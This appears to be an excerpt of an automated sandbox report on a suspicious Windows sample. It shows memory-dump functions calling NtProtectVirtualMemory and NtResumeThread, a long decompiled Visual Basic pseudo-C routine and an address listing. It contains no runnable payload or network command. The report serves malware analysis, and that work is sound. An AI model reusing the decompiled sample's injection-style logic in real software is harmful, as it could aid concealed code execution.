                                                          Function 022664FB, Relevance: 1.6, APIs: 1, Instructions: 57nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?,?,?,000000C0,?,?,00000000,?,022603D9,00000000), ref: 022665DA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: acfef639b1b3e42313a70a80d2b89a630932bcc6477a91ddadf9f4dcd8de515b
                                                          • Instruction ID: 8561fd3cdf727aa0716e868172cb67325331f738a61b22fae7c757e0fcc65eac
                                                          • Opcode Fuzzy Hash: acfef639b1b3e42313a70a80d2b89a630932bcc6477a91ddadf9f4dcd8de515b
                                                          • Instruction Fuzzy Hash: 26113437660713CED7249A90E69C7B43369EF013A8F59929DCA524B86DC33C80C0CB01
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02265DCB, Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000000,?,022659A1,00000040,022606B6,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02265DE7
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: 1a155810a22f01022b9ea00a1d1ffd2a4b442d4a1895ad0ce2269ed9328d8c95
                                                          • Instruction ID: 1a918c5dbcb631d46d2b4d3bcfa31f5d6a87c909f2f8e7ba83832509e4c605d7
                                                          • Opcode Fuzzy Hash: 1a155810a22f01022b9ea00a1d1ffd2a4b442d4a1895ad0ce2269ed9328d8c95
                                                          • Instruction Fuzzy Hash: 02C012E02240002E68048A28CD48C2BB2AA96E9B28B90C32CB872A22CCC930EC048032
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00411110, Relevance: 181.5, APIs: 100, Strings: 3, Instructions: 1203COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 57%
                                                          			E00411110(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				void* _v44;
				long long _v52;
				char _v56;
				char _v60;
				char _v64;
				long long _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				char _v92;
				char _v96;
				signed int _v100;
				char _v104;
				char _v108;
				char _v112;
				signed int _v116;
				char _v124;
				char _v132;
				char _v140;
				char _v148;
				intOrPtr _v156;
				char _v164;
				char _v172;
				char _v180;
				char* _v188;
				intOrPtr _v196;
				char _v200;
				char _v204;
				char _v208;
				intOrPtr _v212;
				char _v216;
				char _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				intOrPtr* _v260;
				signed int _v264;
				intOrPtr* _v268;
				signed int _v272;
				char _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				void* _v304;
				void* _v308;
				signed int _v312;
				intOrPtr* _v316;
				signed int _v320;
				intOrPtr* _v324;
				signed int _v328;
				signed int _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr* _v348;
				signed int _v352;
				intOrPtr* _v356;
				signed int _v360;
				intOrPtr* _v364;
				signed int _v368;
				signed int _v372;
				intOrPtr* _v376;
				signed int _v380;
				intOrPtr* _v384;
				signed int _v388;
				signed int _v392;
				intOrPtr* _v396;
				signed int _v400;
				char _v404;
				signed int _v408;
				intOrPtr* _v412;
				signed int _v416;
				signed int _v420;
				intOrPtr* _v424;
				signed int _v428;
				intOrPtr* _v432;
				signed int _v436;
				signed int _v440;
				intOrPtr* _v444;
				signed int _v448;
				intOrPtr* _v452;
				signed int _v456;
				intOrPtr* _v460;
				signed int _v464;
				intOrPtr* _v468;
				signed int _v472;
				intOrPtr* _v476;
				signed int _v480;
				intOrPtr* _v484;
				signed int _v488;
				signed int _v492;
				signed int _t605;
				signed int _t609;
				signed int _t614;
				signed int _t618;
				signed int _t622;
				signed int _t629;
				signed int _t633;
				signed int _t637;
				signed int _t645;
				signed int _t649;
				signed int _t653;
				signed int _t658;
				signed int _t662;
				signed int _t666;
				signed int _t670;
				char* _t673;
				signed int _t687;
				signed int _t692;
				signed int _t696;
				signed int _t700;
				signed int _t704;
				signed int _t708;
				signed int _t714;
				signed int _t718;
				signed int _t722;
				signed int _t726;
				signed int _t731;
				signed int _t735;
				char* _t738;
				signed int _t749;
				signed int _t760;
				signed int _t764;
				signed int _t768;
				signed int _t772;
				signed int _t783;
				signed int _t794;
				signed int _t798;
				signed int _t802;
				signed int _t806;
				signed int _t810;
				signed int _t814;
				signed int _t818;
				signed int _t822;
				char* _t826;
				signed int _t830;
				signed int* _t834;
				signed int _t838;
				signed int _t866;
				intOrPtr _t873;
				char* _t879;
				intOrPtr _t896;
				intOrPtr _t905;
				void* _t950;
				void* _t952;
				intOrPtr _t953;

				_t953 = _t952 - 0xc;
				 *[fs:0x0] = _t953;
				L00401210();
				_v16 = _t953;
				_v12 = 0x401118;
				_v8 = _a4 & 0x00000001;
				_a4 = _a4 & 0x000000fe;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401216, _t950);
				_v124 = 0xe;
				_v132 = 2;
				_t605 =  &_v132;
				_push(_t605);
				L00401300();
				L00401306();
				_push(_t605);
				_push(L"Out of string space");
				L0040130C();
				asm("sbb eax, eax");
				_v228 =  ~( ~( ~_t605));
				L004012FA();
				L00401312();
				_t609 = _v228;
				if(_t609 != 0) {
					_push(0x83);
					L004012F4();
					_v28 = _t609;
				}
				if( *0x414010 != 0) {
					_v316 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x40509c);
					L004012EE();
					_v316 = 0x414010;
				}
				_v228 =  *_v316;
				_t614 =  *((intOrPtr*)( *_v228 + 0x2b4))(_v228);
				asm("fclex");
				_v232 = _t614;
				if(_v232 >= 0) {
					_v320 = _v320 & 0x00000000;
				} else {
					_push(0x2b4);
					_push(0x404a64);
					_push(_v228);
					_push(_v232);
					L00401324();
					_v320 = _t614;
				}
				if( *0x414010 != 0) {
					_v324 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x40509c);
					L004012EE();
					_v324 = 0x414010;
				}
				_t873 =  *((intOrPtr*)( *_v324));
				_t618 =  &_v96;
				L004012E8();
				_v228 = _t618;
				_t622 =  *((intOrPtr*)( *_v228 + 0x158))(_v228,  &_v76, _t618,  *((intOrPtr*)(_t873 + 0x330))( *_v324));
				asm("fclex");
				_v232 = _t622;
				if(_v232 >= 0) {
					_v328 = _v328 & 0x00000000;
				} else {
					_push(0x158);
					_push(0x404e10);
					_push(_v228);
					_push(_v232);
					L00401324();
					_v328 = _t622;
				}
				_v284 = _v76;
				_v76 = _v76 & 0x00000000;
				_v124 = _v284;
				_v132 = 8;
				_v88 =  *0x401110;
				_t629 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4, _t873,  &_v132,  &_v216);
				_v236 = _t629;
				if(_v236 >= 0) {
					_v332 = _v332 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x404a94);
					_push(_a4);
					_push(_v236);
					L00401324();
					_v332 = _t629;
				}
				_v72 = _v216;
				L004012E2();
				L00401312();
				if( *0x414010 != 0) {
					_v336 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x40509c);
					L004012EE();
					_v336 = 0x414010;
				}
				_t633 =  &_v96;
				L004012E8();
				_v228 = _t633;
				_t637 =  *((intOrPtr*)( *_v228 + 0x138))(_v228,  &_v204, _t633,  *((intOrPtr*)( *((intOrPtr*)( *_v336)) + 0x348))( *_v336));
				asm("fclex");
				_v232 = _t637;
				if(_v232 >= 0) {
					_v340 = _v340 & 0x00000000;
				} else {
					_push(0x138);
					_push(0x404e10);
					_push(_v228);
					_push(_v232);
					L00401324();
					_v340 = _t637;
				}
				_v188 = L"Refunded";
				_v196 = 8;
				_t879 =  &_v132;
				L004012DC();
				_v216 =  *0x401108;
				_v172 = _v204;
				_v180 = 3;
				_v124 =  *0x401100;
				L00401210();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t645 =  *((intOrPtr*)( *_a4 + 0x700))(_a4, 0x10,  &_v216,  &_v132, _t879, _t879,  &_v208);
				_v236 = _t645;
				if(_v236 >= 0) {
					_v344 = _v344 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x404a94);
					_push(_a4);
					_push(_v236);
					L00401324();
					_v344 = _t645;
				}
				_v64 = _v208;
				L004012E2();
				L00401312();
				if( *0x414010 != 0) {
					_v348 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x40509c);
					L004012EE();
					_v348 = 0x414010;
				}
				_t649 =  &_v96;
				L004012E8();
				_v228 = _t649;
				_t653 =  *((intOrPtr*)( *_v228 + 0x160))(_v228,  &_v100, _t649,  *((intOrPtr*)( *((intOrPtr*)( *_v348)) + 0x360))( *_v348));
				asm("fclex");
				_v232 = _t653;
				if(_v232 >= 0) {
					_v352 = _v352 & 0x00000000;
				} else {
					_push(0x160);
					_push(0x404e10);
					_push(_v228);
					_push(_v232);
					L00401324();
					_v352 = _t653;
				}
				_push(0);
				_push(0);
				_push(_v100);
				_push( &_v132);
				L004012D6();
				if( *0x414010 != 0) {
					_v356 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x40509c);
					L004012EE();
					_v356 = 0x414010;
				}
				_t658 =  &_v104;
				L004012E8();
				_v236 = _t658;
				_t662 =  *((intOrPtr*)( *_v236 + 0x140))(_v236,  &_v200, _t658,  *((intOrPtr*)( *((intOrPtr*)( *_v356)) + 0x31c))( *_v356));
				asm("fclex");
				_v240 = _t662;
				if(_v240 >= 0) {
					_v360 = _v360 & 0x00000000;
				} else {
					_push(0x140);
					_push(0x404e10);
					_push(_v236);
					_push(_v240);
					L00401324();
					_v360 = _t662;
				}
				if( *0x414010 != 0) {
					_v364 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x40509c);
					L004012EE();
					_v364 = 0x414010;
				}
				_t666 =  &_v108;
				L004012E8();
				_v244 = _t666;
				_t670 =  *((intOrPtr*)( *_v244 + 0x60))(_v244,  &_v204, _t666,  *((intOrPtr*)( *((intOrPtr*)( *_v364)) + 0x324))( *_v364));
				asm("fclex");
				_v248 = _t670;
				if(_v248 >= 0) {
					_v368 = _v368 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x404e10);
					_push(_v244);
					_push(_v248);
					L00401324();
					_v368 = _t670;
				}
				_v140 = _v204;
				_v148 = 3;
				_v208 =  *0x4010f8;
				_t673 =  &_v132;
				L004012D0();
				 *((intOrPtr*)( *_a4 + 0x728))(_a4, 0x7006e4,  &_v208, 0x168958, 0x7a276940, 0x5b04, _t673, _t673, _v200,  &_v148, 0xffeaa630, 0x5af7);
				L004012CA();
				L004012C4();
				_t687 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v204, 2,  &_v132,  &_v148, 4,  &_v96,  &_v104,  &_v108,  &_v100);
				_v228 = _t687;
				if(_v228 >= 0) {
					_v372 = _v372 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x404a94);
					_push(_a4);
					_push(_v228);
					L00401324();
					_v372 = _t687;
				}
				_v60 = _v204;
				if( *0x414010 != 0) {
					_v376 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x40509c);
					L004012EE();
					_v376 = 0x414010;
				}
				_t692 =  &_v96;
				L004012E8();
				_v228 = _t692;
				_t696 =  *((intOrPtr*)( *_v228 + 0x88))(_v228,  &_v204, _t692,  *((intOrPtr*)( *((intOrPtr*)( *_v376)) + 0x33c))( *_v376));
				asm("fclex");
				_v232 = _t696;
				if(_v232 >= 0) {
					_v380 = _v380 & 0x00000000;
				} else {
					_push(0x88);
					_push(0x404e10);
					_push(_v228);
					_push(_v232);
					L00401324();
					_v380 = _t696;
				}
				if( *0x414010 != 0) {
					_v384 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x40509c);
					L004012EE();
					_v384 = 0x414010;
				}
				_t896 =  *((intOrPtr*)( *_v384));
				_t700 =  &_v100;
				L004012E8();
				_v236 = _t700;
				_t704 =  *((intOrPtr*)( *_v236 + 0x80))(_v236,  &_v208, _t700,  *((intOrPtr*)(_t896 + 0x330))( *_v384));
				asm("fclex");
				_v240 = _t704;
				if(_v240 >= 0) {
					_v388 = _v388 & 0x00000000;
				} else {
					_push(0x80);
					_push(0x404e10);
					_push(_v236);
					_push(_v240);
					L00401324();
					_v388 = _t704;
				}
				_v304 = _v208;
				_v308 = _v204;
				_t708 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, _t896, _t896, 0x3470f7,  &_v216);
				_v244 = _t708;
				if(_v244 >= 0) {
					_v392 = _v392 & 0x00000000;
				} else {
					_push(0x708);
					_push(0x404a94);
					_push(_a4);
					_push(_v244);
					L00401324();
					_v392 = _t708;
				}
				_v52 = _v216;
				_push( &_v100);
				_push( &_v96);
				_push(2);
				L004012CA();
				if( *0x414010 != 0) {
					_v396 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x40509c);
					L004012EE();
					_v396 = 0x414010;
				}
				_t714 =  &_v96;
				L004012E8();
				_v228 = _t714;
				_t718 =  *((intOrPtr*)( *_v228 + 0x120))(_v228,  &_v100, _t714,  *((intOrPtr*)( *((intOrPtr*)( *_v396)) + 0x30c))( *_v396));
				asm("fclex");
				_v232 = _t718;
				if(_v232 >= 0) {
					_v400 = _v400 & 0x00000000;
				} else {
					_push(0x120);
					_push(0x404e38);
					_push(_v228);
					_push(_v232);
					L00401324();
					_v400 = _t718;
				}
				if( *0x414010 != 0) {
					_v404 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x40509c);
					L004012EE();
					_v404 = 0x414010;
				}
				_t722 =  &_v104;
				L004012E8();
				_v236 = _t722;
				_t726 =  *((intOrPtr*)( *_v236 + 0x160))(_v236,  &_v108, _t722,  *((intOrPtr*)( *((intOrPtr*)( *_v404)) + 0x314))( *_v404));
				asm("fclex");
				_v240 = _t726;
				if(_v240 >= 0) {
					_v408 = _v408 & 0x00000000;
				} else {
					_push(0x160);
					_push(0x404e10);
					_push(_v236);
					_push(_v240);
					L00401324();
					_v408 = _t726;
				}
				_push(0);
				_push(0);
				_push(_v108);
				_push( &_v148);
				L004012D6();
				if( *0x414010 != 0) {
					_v412 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x40509c);
					L004012EE();
					_v412 = 0x414010;
				}
				_t905 =  *((intOrPtr*)( *_v412));
				_t731 =  &_v112;
				L004012E8();
				_v244 = _t731;
				_t735 =  *((intOrPtr*)( *_v244 + 0x130))(_v244,  &_v116, _t731,  *((intOrPtr*)(_t905 + 0x360))( *_v412));
				asm("fclex");
				_v248 = _t735;
				if(_v248 >= 0) {
					_v416 = _v416 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x404e10);
					_push(_v244);
					_push(_v248);
					L00401324();
					_v416 = _t735;
				}
				_v288 = _v116;
				_v116 = _v116 & 0x00000000;
				_v156 = _v288;
				_v164 = 9;
				_v224 =  *0x4010f0;
				_t738 =  &_v148;
				L004012D0();
				_v204 = _t738;
				_v292 = _v100;
				_v100 = _v100 & 0x00000000;
				_v124 = _v292;
				_v132 = 9;
				_v216 = 0xe6c7a7b0;
				_v212 = 0x5afd;
				_v404 =  *0x4010e8;
				_t749 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4,  &_v216, _t905, _t905,  &_v132,  &_v204,  &_v224,  &_v164,  &_v208, _t738);
				_v252 = _t749;
				if(_v252 >= 0) {
					_v420 = _v420 & 0x00000000;
				} else {
					_push(0x70c);
					_push(0x404a94);
					_push(_a4);
					_push(_v252);
					L00401324();
					_v420 = _t749;
				}
				_v56 = _v208;
				_push( &_v108);
				_push( &_v112);
				_push( &_v104);
				_push( &_v96);
				_push(4);
				L004012CA();
				_push( &_v164);
				_push( &_v148);
				_push( &_v132);
				_push(3);
				L004012C4();
				if( *0x414010 != 0) {
					_v424 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x40509c);
					L004012EE();
					_v424 = 0x414010;
				}
				_t760 =  &_v96;
				L004012E8();
				_v228 = _t760;
				_t764 =  *((intOrPtr*)( *_v228 + 0xf8))(_v228,  &_v100, _t760,  *((intOrPtr*)( *((intOrPtr*)( *_v424)) + 0x364))( *_v424));
				asm("fclex");
				_v232 = _t764;
				if(_v232 >= 0) {
					_v428 = _v428 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x404e10);
					_push(_v228);
					_push(_v232);
					L00401324();
					_v428 = _t764;
				}
				if( *0x414010 != 0) {
					_v432 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x40509c);
					L004012EE();
					_v432 = 0x414010;
				}
				_t768 =  &_v104;
				L004012E8();
				_v236 = _t768;
				_t772 =  *((intOrPtr*)( *_v236 + 0x130))(_v236,  &_v108, _t768,  *((intOrPtr*)( *((intOrPtr*)( *_v432)) + 0x330))( *_v432));
				asm("fclex");
				_v240 = _t772;
				if(_v240 >= 0) {
					_v436 = _v436 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x404e10);
					_push(_v236);
					_push(_v240);
					L00401324();
					_v436 = _t772;
				}
				L004012D6(); // executed
				L004012B8();
				L00401306();
				_v296 = _v100;
				_v100 = _v100 & 0x00000000;
				_v124 = _v296;
				_v132 = 9;
				L004012B2();
				L00401210();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t783 =  *((intOrPtr*)( *_a4 + 0x710))(_a4,  &_v76, 0x10,  &_v80,  &_v164,  &_v148,  &_v148, _v108, 0, 0);
				_v244 = _t783;
				if(_v244 >= 0) {
					_v440 = _v440 & 0x00000000;
				} else {
					_push(0x710);
					_push(0x404a94);
					_push(_a4);
					_push(_v244);
					L00401324();
					_v440 = _t783;
				}
				L004012BE();
				_push( &_v80);
				_push( &_v76);
				_push(2);
				L004012AC();
				_push( &_v108);
				_push( &_v104);
				_push( &_v96);
				_push(3);
				L004012CA();
				_push( &_v148);
				_push( &_v132);
				_push(2);
				L004012C4();
				if( *0x414010 != 0) {
					_v444 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x40509c);
					L004012EE();
					_v444 = 0x414010;
				}
				_t794 =  &_v96;
				L004012E8();
				_v228 = _t794;
				_t798 =  *((intOrPtr*)( *_v228 + 0xd8))(_v228,  &_v200, _t794,  *((intOrPtr*)( *((intOrPtr*)( *_v444)) + 0x350))( *_v444));
				asm("fclex");
				_v232 = _t798;
				if(_v232 >= 0) {
					_v448 = _v448 & 0x00000000;
				} else {
					_push(0xd8);
					_push(0x404e10);
					_push(_v228);
					_push(_v232);
					L00401324();
					_v448 = _t798;
				}
				if( *0x414010 != 0) {
					_v452 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x40509c);
					L004012EE();
					_v452 = 0x414010;
				}
				_t802 =  &_v100;
				L004012E8();
				_v236 = _t802;
				_t806 =  *((intOrPtr*)( *_v236 + 0x158))(_v236,  &_v76, _t802,  *((intOrPtr*)( *((intOrPtr*)( *_v452)) + 0x330))( *_v452));
				asm("fclex");
				_v240 = _t806;
				if(_v240 >= 0) {
					_v456 = _v456 & 0x00000000;
				} else {
					_push(0x158);
					_push(0x404e10);
					_push(_v236);
					_push(_v240);
					L00401324();
					_v456 = _t806;
				}
				if( *0x414010 != 0) {
					_v460 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x40509c);
					L004012EE();
					_v460 = 0x414010;
				}
				_t810 =  &_v104;
				L004012E8();
				_v244 = _t810;
				_t814 =  *((intOrPtr*)( *_v244 + 0x50))(_v244,  &_v80, _t810,  *((intOrPtr*)( *((intOrPtr*)( *_v460)) + 0x34c))( *_v460));
				asm("fclex");
				_v248 = _t814;
				if(_v248 >= 0) {
					_v464 = _v464 & 0x00000000;
				} else {
					_push(0x50);
					_push(0x404e10);
					_push(_v244);
					_push(_v248);
					L00401324();
					_v464 = _t814;
				}
				if( *0x414010 != 0) {
					_v468 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x40509c);
					L004012EE();
					_v468 = 0x414010;
				}
				_t818 =  &_v108;
				L004012E8();
				_v252 = _t818;
				_t822 =  *((intOrPtr*)( *_v252 + 0x198))(_v252,  &_v84, _t818,  *((intOrPtr*)( *((intOrPtr*)( *_v468)) + 0x304))( *_v468));
				asm("fclex");
				_v256 = _t822;
				if(_v256 >= 0) {
					_v472 = _v472 & 0x00000000;
				} else {
					_push(0x198);
					_push(0x404e38);
					_push(_v252);
					_push(_v256);
					L00401324();
					_v472 = _t822;
				}
				if( *0x414010 != 0) {
					_v476 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x40509c);
					L004012EE();
					_v476 = 0x414010;
				}
				_t826 =  &_v112;
				L004012E8();
				_v260 = _t826;
				_t830 =  *((intOrPtr*)( *_v260 + 0x48))(_v260,  &_v88, _t826,  *((intOrPtr*)( *((intOrPtr*)( *_v476)) + 0x300))( *_v476));
				asm("fclex");
				_v264 = _t830;
				if(_v264 >= 0) {
					_v480 = _v480 & 0x00000000;
				} else {
					_push(0x48);
					_push(0x404e38);
					_push(_v260);
					_push(_v264);
					L00401324();
					_v480 = _t830;
				}
				if( *0x414010 != 0) {
					_v484 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x40509c);
					L004012EE();
					_v484 = 0x414010;
				}
				_t834 =  &_v116;
				L004012E8();
				_v268 = _t834;
				_t838 =  *((intOrPtr*)( *_v268 + 0x118))(_v268,  &_v204, _t834,  *((intOrPtr*)( *((intOrPtr*)( *_v484)) + 0x328))( *_v484));
				asm("fclex");
				_v272 = _t838;
				if(_v272 >= 0) {
					_v488 = _v488 & 0x00000000;
				} else {
					_push(0x118);
					_push(0x404e10);
					_push(_v268);
					_push(_v272);
					L00401324();
					_v488 = _t838;
				}
				_v208 = _v204;
				_v300 = _v88;
				_v88 = _v88 & 0x00000000;
				_v156 = _v300;
				_v164 = 8;
				_v304 = _v84;
				_v84 = _v84 & 0x00000000;
				L00401306();
				_v308 = _v80;
				_v80 = _v80 & 0x00000000;
				_v140 = _v308;
				_v148 = 8;
				_v312 = _v76;
				_v76 = _v76 & 0x00000000;
				_v124 = _v312;
				_v132 = 8;
				L00401210();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)( *_a4 + 0x72c))(_a4, _v200,  &_v132, 0x11c36400, 0x5b02,  &_v148, 0x31fa6,  &_v92, 0x10,  &_v208);
				L004012FA();
				L004012CA();
				L004012C4();
				_t866 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4, 3,  &_v132,  &_v148,  &_v164, 6,  &_v96,  &_v100,  &_v104,  &_v108,  &_v112,  &_v116);
				_v228 = _t866;
				if(_v228 >= 0) {
					_v492 = _v492 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x404a94);
					_push(_a4);
					_push(_v228);
					L00401324();
					_v492 = _t866;
				}
				_v8 = 0;
				asm("wait");
				_push(0x41253b);
				L00401312();
				return _t866;
			}
































































































































































                                                          0x00411113
                                                          0x00411122
                                                          0x0041112e
                                                          0x00411136
                                                          0x00411139
                                                          0x00411146
                                                          0x0041114e
                                                          0x00411159
                                                          0x0041115c
                                                          0x00411163
                                                          0x0041116a
                                                          0x0041116d
                                                          0x0041116e
                                                          0x00411178
                                                          0x0041117d
                                                          0x0041117e
                                                          0x00411183
                                                          0x0041118a
                                                          0x00411190
                                                          0x0041119a
                                                          0x004111a2
                                                          0x004111a7
                                                          0x004111b0
                                                          0x004111b2
                                                          0x004111b7
                                                          0x004111bc
                                                          0x004111bc
                                                          0x004111c6
                                                          0x004111e3
                                                          0x004111c8
                                                          0x004111c8
                                                          0x004111cd
                                                          0x004111d2
                                                          0x004111d7
                                                          0x004111d7
                                                          0x004111f5
                                                          0x00411209
                                                          0x0041120f
                                                          0x00411211
                                                          0x0041121e
                                                          0x00411243
                                                          0x00411220
                                                          0x00411220
                                                          0x00411225
                                                          0x0041122a
                                                          0x00411230
                                                          0x00411236
                                                          0x0041123b
                                                          0x0041123b
                                                          0x00411251
                                                          0x0041126e
                                                          0x00411253
                                                          0x00411253
                                                          0x00411258
                                                          0x0041125d
                                                          0x00411262
                                                          0x00411262
                                                          0x00411288
                                                          0x00411292
                                                          0x00411296
                                                          0x0041129b
                                                          0x004112b3
                                                          0x004112b9
                                                          0x004112bb
                                                          0x004112c8
                                                          0x004112ed
                                                          0x004112ca
                                                          0x004112ca
                                                          0x004112cf
                                                          0x004112d4
                                                          0x004112da
                                                          0x004112e0
                                                          0x004112e5
                                                          0x004112e5
                                                          0x004112f7
                                                          0x004112fd
                                                          0x00411307
                                                          0x0041130a
                                                          0x00411323
                                                          0x0041132e
                                                          0x00411334
                                                          0x00411341
                                                          0x00411363
                                                          0x00411343
                                                          0x00411343
                                                          0x00411348
                                                          0x0041134d
                                                          0x00411350
                                                          0x00411356
                                                          0x0041135b
                                                          0x0041135b
                                                          0x00411370
                                                          0x00411376
                                                          0x0041137e
                                                          0x0041138a
                                                          0x004113a7
                                                          0x0041138c
                                                          0x0041138c
                                                          0x00411391
                                                          0x00411396
                                                          0x0041139b
                                                          0x0041139b
                                                          0x004113cb
                                                          0x004113cf
                                                          0x004113d4
                                                          0x004113ef
                                                          0x004113f5
                                                          0x004113f7
                                                          0x00411404
                                                          0x00411429
                                                          0x00411406
                                                          0x00411406
                                                          0x0041140b
                                                          0x00411410
                                                          0x00411416
                                                          0x0041141c
                                                          0x00411421
                                                          0x00411421
                                                          0x00411430
                                                          0x0041143a
                                                          0x0041144a
                                                          0x0041144d
                                                          0x00411458
                                                          0x00411464
                                                          0x0041146a
                                                          0x00411483
                                                          0x00411494
                                                          0x004114a1
                                                          0x004114a2
                                                          0x004114a3
                                                          0x004114a4
                                                          0x004114ad
                                                          0x004114b3
                                                          0x004114c0
                                                          0x004114e2
                                                          0x004114c2
                                                          0x004114c2
                                                          0x004114c7
                                                          0x004114cc
                                                          0x004114cf
                                                          0x004114d5
                                                          0x004114da
                                                          0x004114da
                                                          0x004114ef
                                                          0x004114f5
                                                          0x004114fd
                                                          0x00411509
                                                          0x00411526
                                                          0x0041150b
                                                          0x0041150b
                                                          0x00411510
                                                          0x00411515
                                                          0x0041151a
                                                          0x0041151a
                                                          0x0041154a
                                                          0x0041154e
                                                          0x00411553
                                                          0x0041156b
                                                          0x00411571
                                                          0x00411573
                                                          0x00411580
                                                          0x004115a5
                                                          0x00411582
                                                          0x00411582
                                                          0x00411587
                                                          0x0041158c
                                                          0x00411592
                                                          0x00411598
                                                          0x0041159d
                                                          0x0041159d
                                                          0x004115ac
                                                          0x004115ae
                                                          0x004115b0
                                                          0x004115b6
                                                          0x004115b7
                                                          0x004115c6
                                                          0x004115e3
                                                          0x004115c8
                                                          0x004115c8
                                                          0x004115cd
                                                          0x004115d2
                                                          0x004115d7
                                                          0x004115d7
                                                          0x00411607
                                                          0x0041160b
                                                          0x00411610
                                                          0x0041162b
                                                          0x00411631
                                                          0x00411633
                                                          0x00411640
                                                          0x00411665
                                                          0x00411642
                                                          0x00411642
                                                          0x00411647
                                                          0x0041164c
                                                          0x00411652
                                                          0x00411658
                                                          0x0041165d
                                                          0x0041165d
                                                          0x00411673
                                                          0x00411690
                                                          0x00411675
                                                          0x00411675
                                                          0x0041167a
                                                          0x0041167f
                                                          0x00411684
                                                          0x00411684
                                                          0x004116b4
                                                          0x004116b8
                                                          0x004116bd
                                                          0x004116d8
                                                          0x004116db
                                                          0x004116dd
                                                          0x004116ea
                                                          0x0041170c
                                                          0x004116ec
                                                          0x004116ec
                                                          0x004116ee
                                                          0x004116f3
                                                          0x004116f9
                                                          0x004116ff
                                                          0x00411704
                                                          0x00411704
                                                          0x00411719
                                                          0x0041171f
                                                          0x0041172f
                                                          0x0041174c
                                                          0x00411750
                                                          0x00411779
                                                          0x00411791
                                                          0x004117a6
                                                          0x004117bd
                                                          0x004117c3
                                                          0x004117d0
                                                          0x004117f2
                                                          0x004117d2
                                                          0x004117d2
                                                          0x004117d7
                                                          0x004117dc
                                                          0x004117df
                                                          0x004117e5
                                                          0x004117ea
                                                          0x004117ea
                                                          0x004117ff
                                                          0x00411809
                                                          0x00411826
                                                          0x0041180b
                                                          0x0041180b
                                                          0x00411810
                                                          0x00411815
                                                          0x0041181a
                                                          0x0041181a
                                                          0x0041184a
                                                          0x0041184e
                                                          0x00411853
                                                          0x0041186e
                                                          0x00411874
                                                          0x00411876
                                                          0x00411883
                                                          0x004118a8
                                                          0x00411885
                                                          0x00411885
                                                          0x0041188a
                                                          0x0041188f
                                                          0x00411895
                                                          0x0041189b
                                                          0x004118a0
                                                          0x004118a0
                                                          0x004118b6
                                                          0x004118d3
                                                          0x004118b8
                                                          0x004118b8
                                                          0x004118bd
                                                          0x004118c2
                                                          0x004118c7
                                                          0x004118c7
                                                          0x004118ed
                                                          0x004118f7
                                                          0x004118fb
                                                          0x00411900
                                                          0x0041191b
                                                          0x00411921
                                                          0x00411923
                                                          0x00411930
                                                          0x00411955
                                                          0x00411932
                                                          0x00411932
                                                          0x00411937
                                                          0x0041193c
                                                          0x00411942
                                                          0x00411948
                                                          0x0041194d
                                                          0x0041194d
                                                          0x0041196f
                                                          0x00411979
                                                          0x00411984
                                                          0x0041198a
                                                          0x00411997
                                                          0x004119b9
                                                          0x00411999
                                                          0x00411999
                                                          0x0041199e
